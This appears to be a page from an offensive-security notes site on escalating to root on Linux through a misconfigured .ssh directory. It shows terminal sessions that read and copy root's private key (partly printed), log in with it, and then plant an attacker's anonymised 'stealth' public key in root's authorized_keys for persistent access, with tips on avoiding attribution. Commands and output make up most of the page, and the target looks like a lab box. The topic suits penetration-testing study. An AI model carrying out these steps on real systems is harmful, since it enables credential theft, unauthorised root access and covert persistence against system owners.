SSH DIRECTORY

If read access is available to a user's .ssh directory (e.g., "/home/user/.ssh/" or "/root/.ssh/", it's possible to exfiltrate private SSH key "id_rsa". Once copied to the attacker's machine, this key can be used to authenticate as that user via SSH using the -i flag.

READ ACCESS

#enumerate
user@target:~$ ls -la ~/.ssh; ls -la /root/.ssh
 ls: cannot access '/home/user2/.ssh': No such file or directory
 total 20
 drwxr-x--- 1 root user2 4096 Feb 12  2021 .
 drwxr-x--- 1 root user2 4096 Feb 12  2021 ..
 -rw------- 1 root root   571 Feb 12  2021 authorized_keys
 -rw-r--r-- 1 root root  2602 Feb 12  2021 id_rsa
 -rw-r--r-- 1 root root   571 Feb 12  2021 id_rsa.pub

#
user@target:~$ cat /root/.ssh/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEAt3nX57B1Z2nSHY+aaj4lKt9lyeLVNiFh7X0vQisxoPv9BjNppQxV
 PtQ8csvHq/GatgSo8oVyskZIRbWb7QvCQI7JsT+Pr4ieQayNIoDm6+i9F1hXyMc0VsAqMk
 05z9YKStLma0iN6l81Mr0dAI63x0mtwRKeHvJR+EiMtUTlAX9++kQJmD9F3lDSnLF4/dEy
 G4WQSAH7F8Jz3OrRKLprBiDf27LSPgOJ6j8OLn4bsiacaWFBl3+CqkXeGkecEHg5dIL4K+
 aPDP2xzFB0d0c7kZ8AtogtD3UYdiVKuF5fzOPJxJO1Mko7UsrhAh0T6mIBJWRljjUtHwSs
 ntrFfE5trYET5L+ov5WSi+tyBrAfCcg0vW1U78Ge/3h4zAG8KaGZProMUSlu3MbCfl1uK/
 ...==
 -----END OPENSSH PRIVATE KEY-----

#
root@oco:~$ nano target-94.237.48.12-id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEAt3nX57B1Z2nSHY+aaj4lKt9lyeLVNiFh7X0vQisxoPv9BjNppQxV
 PtQ8csvHq/GatgSo8oVyskZIRbWb7QvCQI7JsT+Pr4ieQayNIoDm6+i9F1hXyMc0VsAqMk
 05z9YKStLma0iN6l81Mr0dAI63x0mtwRKeHvJR+EiMtUTlAX9++kQJmD9F3lDSnLF4/dEy
 G4WQSAH7F8Jz3OrRKLprBiDf27LSPgOJ6j8OLn4bsiacaWFBl3+CqkXeGkecEHg5dIL4K+
 aPDP2xzFB0d0c7kZ8AtogtD3UYdiVKuF5fzOPJxJO1Mko7UsrhAh0T6mIBJWRljjUtHwSs
 ntrFfE5trYET5L+ov5WSi+tyBrAfCcg0vW1U78Ge/3h4zAG8KaGZProMUSlu3MbCfl1uK/
 ...==
 -----END OPENSSH PRIVATE KEY-----
 
 * paste copied key value

root@oco:~$ chmod 600 target-94.237.48.12-id_rsa

 * changing the file permission to restrictive is required; else
   the ssh server would prevent them from working

root@oco:~$ ssh -i target-94.237.48.12-id_rsa [email protected] -p 45074
 Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.1.0-10-amd64 x86_64)

  * Documentation:  https://help.ubuntu.com
  * Management:     https://landscape.canonical.com
  * Support:        https://ubuntu.com/advantage


 This system has been minimized by removing packages and content that are
 not required on a system that users do not log into.
 
 To restore this content, you can run the 'unminimize' command.

 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.

root@target:~#

WRITE ACCESS: NON-ATTRIBUTION METHOD

With write access to a target user's .ssh directory, an attacker can append their public key to the target's authorized_keys file, granting SSH access as that user. This technique only works if the attacker already has control over the target user, as most SSH configurations will reject keys added by unauthorized users.

#identify whether write access is allowed
user2@target:~$ ls -la /root/.ssh
 total 24
 drwxr-x--- 1 root user2 4096 Feb 12  2021 .
 drwxr-x--- 1 root user2 4096 Jun  8 02:27 ..
 -rw------- 1 root root   571 Feb 12  2021 authorized_keys
 -rw-r--r-- 1 root root  2602 Feb 12  2021 id_rsa
 -rw-r--r-- 1 root root   571 Feb 12  2021 id_rsa.pub

 * write access identified in the authorized_keys file
 
#use for non-attribution
root@oco:~$ sudo adduser --disabled-password --gecos "" deploy
 Adding user `deploy' ...
 Adding new group `deploy' (1003) ...
 Adding new user `deploy' (1003) with group `deploy (1003)' ...
 Creating home directory `/home/deploy' ...
 Copying files from `/etc/skel' ...
 Adding new user `deploy' to supplemental / extra groups `users' ...
 Adding user `deploy' to group `users' ...

 * This creates a local user "deploy" without a password and isn't able to log in
   without specifically being allowed 

root@oco:~$ sudo -u deploy -i

 * the -i fully simulates the specified user's login
 
root@oco:~$ ssh-keygen -t rsa -b 3072 -C "" -f ~/.ssh/target-94.237.48.12-stealth_key
 Generating public/private rsa key pair.
 Created directory '/home/deploy/.ssh'.
 Enter passphrase (empty for no passphrase): 
 Enter same passphrase again:  
 Your identification has been saved in /home/deploy/.ssh/target-94.237.48.12-stealth_key
 Your public key has been saved in /home/deploy/.ssh/target-94.237.48.12-stealth_key.pub
 The key fingerprint is:
 SHA256:NpCtK/Xs8H2ZmWfXufjMP5AhKIRYhJwxNYbnewyY13o 
 The key's randomart image is:
 +---[RSA 3072]----+
 |  .oX*.          |
 |   *oo.+         |
 |    = = . .      |
 |   o + = . . .   |
 |    . B S   . o  |
 |     + E .   o   |
 |    . = o    =. o|
 |     . + .  * *oo|
 |        o .. +.*=|
 +----[SHA256]-----+

 * the -C "" prevents adding real username@hostname as a comment
  * the -f key saves private key as key and public key as key.pub
    - key is the private key that is kept secret
    - key.pub is the public key that is deployed on the target
    
#append append ...stealth_key.pu content to target authorized_keys files
root@oco:~$ cat /home/deploy/.ssh/target-94.237.48.12-stealth_key.pub
 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzg1T8hf18kqKqIDlt77RVn9e/E1/XxQlv9oc8g6Oi/4l/6exWxB65veTijVBjx2n7Or75a8K4X1eubO5mAXTlDFk5LT/sn2oX9hw79oE5a4B22zUsaXx7K9ojTnxGnWXdq2ej2njBgYxbZseupLi2h23Fby7y0RmnCWm71EH1WNJT7BHIRfh977KUNPs6i+WENW6n7zx45YezaT+HX44nJsIZn+s/Ggoch82mpFaIeR2LQOl+X/MUodi+G0qj2xBvi/dIMyTmG+7bMfdIW2NXeKvS/qMPJnWVV+L6CmMleViiTkzY1WH9RRiIhpMUmsfTlaCLevQ7aQDPL5AXI/IkFzew6Uzp/6mbxLlxkD4OVc2TLJNV24EoTidMdtkmBISEw1QxqNcYm6liwrvqFFhRpHn24pNI7evuGzYYOvC4gIaVeOgNn7t9e6Q8CAyP5XhMxCESEgOlcAEEZrBQASjT8O8ul7OhlymPBVpgVKCssh2xvcNLUWwdLhpXnKpzou0=
 
 * copy this public key to the target's WRITABLE authorized_key file
    - NO youruser@yourhost is required when injecting the public key in the authorized_keys file
    - the youruser@yourhost is an optional comment portion and ignored by the SSH daemon for authentication
    - it is merely for human readability only and has no impact on functionality. 
       - the comment part can be replaced by something innocuous such as key1
        
user2@target:~$ nano /root/.ssh/authorized_keys
 ssh-rsa...
 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzg1T8hf18kqKqIDlt77RVn9e/E1/XxQlv9oc8g6Oi/4l/6exWxB65veTijVBjx2n7Or75a8K4X1eubO5mAXTlDFk5LT/sn2oX9hw79oE5a4B22zUsaXx7K9ojTnxGnWXdq2ej2njBgYxbZseupLi2h23Fby7y0RmnCWm71EH1WNJT7BHIRfh977KUNPs6i+WENW6n7zx45YezaT+HX44nJsIZn+s/Ggoch82mpFaIeR2LQOl+X/MUodi+G0qj2xBvi/dIMyTmG+7bMfdIW2NXeKvS/qMPJnWVV+L6CmMleViiTkzY1WH9RRiIhpMUmsfTlaCLevQ7aQDPL5AXI/IkFzew6Uzp/6mbxLlxkD4OVc2TLJNV24EoTidMdtkmBISEw1QxqNcYm6liwrvqFFhRpHn24pNI7evuGzYYOvC4gIaVeOgNn7t9e6Q8CAyP5XhMxCESEgOlcAEEZrBQASjT8O8ul7OhlymPBVpgVKCssh2xvcNLUWwdLhpXnKpzou0=
 
 * there can be multiple entries each separated by their own line
 
#access the target
root@oco:~$ ssh -i ~/.ssh/target-94.237.48.12-stealth_key [email protected] -p 45074
 The authenticity of host '[94.237.48.12]:45074 ([94.237.48.12]:45074)' can't be established.
 ED25519 key fingerprint is SHA256:KDcF5lg81jNEGgdr67bEo+Ui1pmsyHXKnw/ZHPLZCyY.
 This key is not known by any other names.
 Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
 Warning: Permanently added '[94.237.48.12]:45074' (ED25519) to the list of known hosts.
 Enter passphrase for key '/home/deploy/.ssh/target-94.237.48.12-stealth_key': 
 
 Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.1.0-10-amd64 x86_64)

  * Documentation:  https://help.ubuntu.com
  * Management:     https://landscape.canonical.com
  * Support:        https://ubuntu.com/advantage


 This system has been minimized by removing packages and content that are
 not required on a system that users do not log into. 

 To restore this content, you can run the 'unminimize' command.
 Last login: Sun Jun  8 02:27:59 2025 from 10.30.18.213

root@target:~$

PreviousVI NextSUDOERS

Last updated 6 months ago